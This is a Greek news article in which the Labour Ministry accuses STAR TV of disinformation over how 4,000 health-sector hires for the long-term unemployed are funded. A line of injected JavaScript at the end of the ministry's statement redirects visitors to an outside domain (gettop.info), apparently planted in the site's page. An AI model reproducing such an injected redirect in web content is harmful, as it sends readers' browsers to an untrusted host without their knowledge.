Υπ. Εργασίας κατά STAR για ρεπορτάζ: Πάει σύννεφο η παραπληροφόρηση

0
9

 

Το υπουργείο Εργασίας απαντά σε έντονο ύφος στον τηλεοπτικό σταθμό Star με αφορμή ρεπορτάζ που πρόβαλε το κανάλι σχετικά με τις προσλήψεις στον τομέα της υγείας.

Όπως αναφέρεται στην ανακοίνωση του υπουργείου: «Στο χθεσινό κεντρικό δελτίο ειδήσεων του τηλεοπτικού σταθμού STAR μεταδόθηκε ρεπορτάζ, σύμφωνα με το οποίο οι 4.000 προσλήψεις, που ανακοίνωσε πρόσφατα οι κυβέρνηση για τη στελέχωση των υπηρεσιών υγείας, θα χρηματοδοτηθούν από κοινοτικούς πόρους και όχι από τα έσοδα που προέκυψαν από τον διαγωνισμό για τις τηλεοπτικές άδειες.

«Η κοροϊδία πάει σύννεφο» ήταν το σχόλιο της κεντρικής παρουσιάστριας του δελτίου ειδήσεων.

«Αυτό που πάει σύννεφο, είναι η παραπληροφόρηση», είναι η απάντηση της Αναπληρώτριας Υπουργού Εργασίας, Ράνιας Αντωνοπούλου.

«Κάποιοι τηλεοπτικοί σταθμοί, για τους δικούς τους λόγους, επιχειρούν συστηματικά να υποβαθμίζουν ή να υπονομεύουν οποιαδήποτε θετική δράση πραγματοποιεί η κυβέρνηση. Όμως, η καταστροφολογία και η διαστρέβλωση της πραγματικότητας πρέπει να έχουν και ένα όριο, ειδικά όταν μιλάμε για το υπ’ αριθμόν ένα πρόβλημα της ελληνικής κοινωνίας, την ανεργία. Το πρόγραμμα για τους 4000 μακροχρόνια ανέργους θα χρηματοδοτηθεί, επαναλαμβάνω, αποκλειστικά από τους πόρους που εισρέουν στα δημόσια ταμεία από το διαγωνισμό των τηλεοπτικών αδειών» καταλήγει η ανακοίνωση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here